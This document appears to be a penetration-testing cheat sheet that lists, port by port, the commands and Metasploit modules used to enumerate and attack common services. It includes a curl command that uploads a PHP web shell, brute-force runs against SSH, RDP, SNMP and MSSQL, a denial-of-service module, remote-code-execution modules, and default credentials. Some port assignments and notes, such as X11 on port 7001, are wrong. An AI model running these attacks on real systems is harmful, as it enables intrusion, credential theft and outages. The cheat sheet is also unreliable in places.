VAPT - 2023
Enumeration - Open Ports

Checklist - Open Ports Recon & Enumeration

Checklist for Enumeration & Vulnerability Scanning for Common Open Ports:

Port: 7 ECHO
  nc -uvn (ip) 7

Port: 13 DAYTIME
  nmap -sV -p 13 --script=daytime (ip)   (leads to DDoS)

Port: 21 FTP

  nmap -p 21 -sV (ip)
  nmap -p 21 --script=ftp-* -d (ip)
  nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,ftp-vuln-cve2010-4221,tftp-enum -p 21 -n -v -sV -Pn (ip)
  use auxiliary/scanner/ftp/anonymous
  use auxiliary/scanner/ftp/ftp_login
  use auxiliary/scanner/ftp/ftp_version
  use auxiliary/scanner/ftp/konica_ftp_traversal

Port: 22 SSH

Manual:

  ssh (user)@(ip)
  ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 (user)@(ip)
  ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc (user)@(ip)
  nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root (ip)
  nmap -p 22 -n -v -sV -Pn --script ssh-hostkey (ip)
  nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt (ip)
  use auxiliary/scanner/ssh/fortinet_backdoor
  use auxiliary/scanner/ssh/juniper_backdoor
  use auxiliary/scanner/ssh/ssh_enumusers
  use auxiliary/scanner/ssh/ssh_identify_pubkeys
  use auxiliary/scanner/ssh/ssh_login
  use auxiliary/scanner/ssh/ssh_login_pubkey
  use auxiliary/scanner/ssh/ssh_version

Port: 23 TELNET

  nmap -p 23 -sV (ip)
  nmap -p 23 --script=telnet-* (ip)

Port: 25 SMTP

  nmap --script=smtp-enum-users,smtp-commands,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764,smtp-vuln-cve2010-4344 -p 25 -n -v -sV -Pn (ip)
  use auxiliary/scanner/smtp/smtp_enum
  use auxiliary/scanner/smtp/smtp_ntlm_domain
  use auxiliary/scanner/smtp/smtp_relay
  use auxiliary/scanner/smtp/smtp_version

Port: 43 WHOIS
  whois -h (host) -p (port) "example.com"

Port: 53 DNS
  nmap -Pn -p 53 --script=dns-nsid (ip)

Port: 69 TFTP
  nmap -Pn -sU -p 69 -sV --script tftp-enum (ip)
  use auxiliary/admin/tftp/tftp_transfer_util

Port: 79 FINGER
  nc -vn (ip) 79
  echo "root" | nc -vn (ip) 79
  use auxiliary/scanner/finger/finger_users

Port: 80 HTTP

  nikto -h http://(ip)/
  curl -v -X PUT -d '<?php shell_exec($_GET["cmd"]); ?>' http://192.168.1.10/shell.php   (for PHP sites)
  sqlmap -u http://(ip)/ --crawl=5 --dbms=mysql
  nmap -p 80 -n -v -sV -Pn --script http-backup-finder,http-config-backup,http-errors,http-headers,http-iis-webdav-vuln,http-internal-ip-disclosure,http-methods,http-php-version,http-qnap-nas-info,http-robots.txt,http-shellshock,http-slowloris-check,http-waf-detect,http-vuln* (ip)

Port: 81 HTTP (VisualSVN Server)
  nmap -p 80,81,443 --script http-svn-info (ip)

Port: 88 Kerberos
  Check for MS14-068

Port: 110 POP3

  nmap -p 110,995 --script pop3-ntlm-info (ip)
  use auxiliary/scanner/pop3/pop3_version

Port: 111 RPCBIND

  rpcinfo (ip)
  nmap -sSUC -p 111 (ip)
  use auxiliary/scanner/nfs/nfsmount
  use auxiliary/dos/rpc/rpcbomb   (if an NFS service is found, exploit it with this)

Port: 113 Ident
  nc -vn (ip) 113

Port: 123 NTP
  nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 (ip)

Port: 135 Microsoft RPC

  nmap -sV --script=nfs-* (ip)
  nmap -n -v -sV -Pn -p 135 --script=msrpc-enum (ip)
  rpcinfo -p (ip)
  rpcclient -I (ip) (hostname)
  showmount -e (ip)
  mount -t nfs 192.168.0.100:/home/machine /tmp/mnt -o nolock
  use exploit/windows/dcerpc/ms05_017_msmq

Port: 139/445 SMB Service

  nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smb-vuln* (ip)
  enum4linux -a 192.168.1.10
  rpcclient -U "" 192.168.1.10   (then run: srvinfo, enumdomusers, getdompwinfo)
  smbclient -L 192.168.1.10
  smbclient '\\192.168.1.10\ipc$' -U administrator
  smbclient //192.168.1.10/ipc$ -U administrator
  smbclient //192.168.1.10/admin$ -U administrator
  use auxiliary/scanner/smb/psexec_loggedin_users
  use auxiliary/scanner/smb/smb_enumshares
  use auxiliary/scanner/smb/smb_enumusers
  use auxiliary/scanner/smb/smb_enumusers_domain
  use auxiliary/scanner/smb/smb_login
  use auxiliary/scanner/smb/smb_lookupsid
  use auxiliary/scanner/smb/smb_ms17_010
  use auxiliary/scanner/smb/smb_version

Port: 161/162 UDP SNMP Service

  nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat (ip)
  snmp-check -t 192.168.1.10 -c public
  snmpwalk -c public -v 1 192.168.1.10 1.3.6.1.4.1.77.1.2.25   (replace the OID with a MIB tree value from the table below)
  hydra -P passwords.txt -v (ip) snmp   (community strings and MIB tree reference below)

  Common community strings: public, private, community

  SNMP MIB Trees:
    1.3.6.1.2.1.25.1.6.0    System Processes
    1.3.6.1.2.1.25.4.2.1.2  Running Programs
    1.3.6.1.2.1.25.4.2.1.4  Processes Path
    1.3.6.1.2.1.25.2.3.1.4  Storage Units
    1.3.6.1.2.1.25.6.3.1.2  Software Name
    1.3.6.1.4.1.77.1.2.25   User Accounts
    1.3.6.1.2.1.6.13.1.3    TCP Local Ports

  use auxiliary/scanner/snmp/snmp_enum
  use auxiliary/scanner/snmp/snmp_enum_hp_laserjet
  use auxiliary/scanner/snmp/snmp_enumshares
  use auxiliary/scanner/snmp/snmp_enumusers
  use auxiliary/scanner/snmp/snmp_login

Port: 194, 6660-7000 IRC
  nc -vn (ip) 194
  openssl s_client -connect (ip):(port) -quiet
  nmap -sV --script=irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 (ip)

Port: 264 Checkpoint FW
  use auxiliary/gather/checkpoint_hostname

Port: 389/636 LDAP
  ldapsearch -h (ip) -p 389 -x -b "dc=mywebsite,dc=com"
  nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' (ip)
  nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows Server",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' (ip)
  nmap -sV --script "ldap* and not brute" (ip)   (using anonymous credentials)

Port: 443 HTTPS

  sslscan https://(ip)/
  nmap -sV --script=ssl-heartbleed (ip)

Port: 500 IPSEC IKE/VPN
  ike-scan -M (ip)
  ike-scan -M --showbackoff (ip)

Port: 502 Modbus
  nmap --script modbus-discover -p 502 (ip)

Port: 512 Rexec
  nmap -p 512 --script rexec-brute (ip)

Port: 513 Rlogin
  nmap -p 513 --script rlogin-brute (ip)
  rlogin -l root (ip)

Port: 514 Rsh
  rsh (ip) <command>

Port: 548 AFP
  use auxiliary/scanner/afp/afp_server_info
  nmap -sV --script "afp-* and not dos and not brute" -p 548 (ip)

Port: 554 RTSP
  Check for IP cameras
  nmap -sV --script "rtsp-*" -p 554 (ip)

Port: 587 Submission
  Outgoing SMTP port. If Postfix is running, check CVE-2014-6271

Port: 623 IPMI
  nmap -n -sU -p 623 (ip)
  use auxiliary/scanner/ipmi/ipmi_version
  use auxiliary/scanner/ipmi/ipmi_cipher_zero
  use auxiliary/scanner/ipmi/ipmi_dumphashes
  SuperMicro IPMI UPnP: use exploit/multi/upnp/libupnp_ssdp_overflow

Port: 631 CUPS
  Check http://(ip):631/admin and http://(ip):631/printers

Port: 873 Rsync
  nc -vn (ip) 873
  nmap -sV --script "rsync-list-modules" -p 873 (ip)
  use auxiliary/scanner/rsync/modules_list

Port: 902 VMware Authentication Daemon
  use auxiliary/scanner/vmware/vmauthd_login
  use auxiliary/scanner/vmware/vmauthd_version
  nmap -p 902 --script vmauthd-brute (ip)

Port: 1026 Rusersd
  rusers -l (ip)

Port: 1098/1099 Java RMI
  nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098,1099 (ip)
  use auxiliary/scanner/misc/java_rmi_server
  use auxiliary/gather/java_rmi_registry

Port: 1433 MSSQL Service

  nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt (ip)
  nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password (ip)
  sqsh -S 192.168.1.10 -U sa
  use auxiliary/scanner/mssql/mssql_login
  use auxiliary/admin/mssql/mssql_exec
  use auxiliary/admin/mssql/mssql_enum

Port: 1521 ORACLE DB Service

  nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt (ip)
  nmap -n -v -sV -Pn -p 1521 --script=oracle-sid-brute (ip)
  tnscmd10g version -h 192.168.1.10
  tnscmd10g status -h 192.168.1.10
  use auxiliary/scanner/oracle/emc_sid
  use auxiliary/scanner/oracle/oracle_login
  use auxiliary/scanner/oracle/sid_brute
  use auxiliary/scanner/oracle/sid_enum
  use auxiliary/scanner/oracle/tnslsnr_version
  use auxiliary/scanner/oracle/tnspoison_checker

Port: 1720 H.323 (VoIP)
  use auxiliary/scanner/h323/h323_version

Port: 2000 Cisco SCCP
  telnet (ip) 2000

Port: 2049 NFS
  showmount -e 192.168.1.100
  mount 192.168.1.100:/ /tmp/NFS
  mount -t nfs 192.168.1.100:/ /tmp/NFS

Port: 2100 Oracle XML DB
  Access through FTP. Default logins: sys:sys, scott:tiger

Port: 2181 ZooKeeper
  nc (ip) 2181

Port: 3097 Chunghwa Telecom Data
  nc (ip) 3097
  After connecting with netcat, read /etc/passwd using the post-exploitation misc script

Port: 3306 MYSQL Service

  nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 (ip)
  mysql --host=192.168.1.10 -u root -p
  use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  use auxiliary/scanner/mysql/mysql_login
  use auxiliary/scanner/mysql/mysql_schemadump
  use auxiliary/scanner/mysql/mysql_version
  use auxiliary/scanner/mysql/mysql_writable_dirs

Port: 3389 RDP

  ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1
  rdesktop -u guest -p guest (ip) -g 94%
  rdesktop 192.168.1.10
  use auxiliary/scanner/rdp/ms12_020_check
  use auxiliary/scanner/rdp/rdp_scanner

Port: 4369 EPMD
  nmap -sV -Pn -n -T4 -p 4369 --script epmd-info (ip)
  use exploit/multi/misc/erlang_cookie_rce

Port: 4445 Upnotifyp
  Check with netcat and a browser

Port: 4555 RSIP
  Check for CVE-2015-7611

Port: 5060/5061 SIP (VoIP devices)
  use auxiliary/scanner/sip/enumerator
  nmap --script=sip-enum-users -sU -p 5060 (ip)

Port: 5353 mDNS
  nmap -Pn -sUC -p 5353 (ip)

Port: 5432/5433 PostgreSQL
  use auxiliary/scanner/postgres/postgres_version
  use auxiliary/scanner/postgres/postgres_dbname_flag_injection
  use auxiliary/scanner/postgres/postgres_hashdump
  use auxiliary/scanner/postgres/postgres_schemadump
  use auxiliary/admin/postgres/postgres_readfile
  use exploit/linux/postgres/postgres_payload
  use exploit/windows/postgres/postgres_payload

Port: 5671/5672 AMQP
  nmap -sV -Pn -n -T4 -p 5672 --script amqp-info (ip)

Port: 5800/5801 VNC
  nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p (port) (ip)
  use auxiliary/scanner/vnc/vnc_none_auth

Port: 5900 VNC
  vncviewer (ip)
  use auxiliary/scanner/vnc/vnc_login
  use auxiliary/scanner/vnc/vnc_none_auth

Port: 7001 X11
  nmap -Pn -A -p 7001 --script=x11-access (ip)   (unauthenticated access)

Port: 7552 Microsoft Terminal Service
  nmap --script rdp-ntlm-info (ip)
  nmap -sV --script=rdp-vuln-ms12-020 (ip)
  nmap --script rdp-enum-encryption (ip)

Port: 8009 Apache JServ Protocol (AJP)
  nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -p 8009 (ip)

Port: 8014, 8443, 8445, 9090 Symantec Endpoint Protection Manager
  Default credentials
  use exploit/windows/http/sepm_auth_bypass_rce
  https://www.exploit-db.com/exploits/31853

Port: 8400 Commvault cvd
  use exploit/windows/misc/commvault_cmd_exec

Port: 10000 NDMP (Symantec/Veritas Backup Exec, NDMPv3)
  use exploit/windows/backupexec/ssl_uaf


Last updated 4 years ago
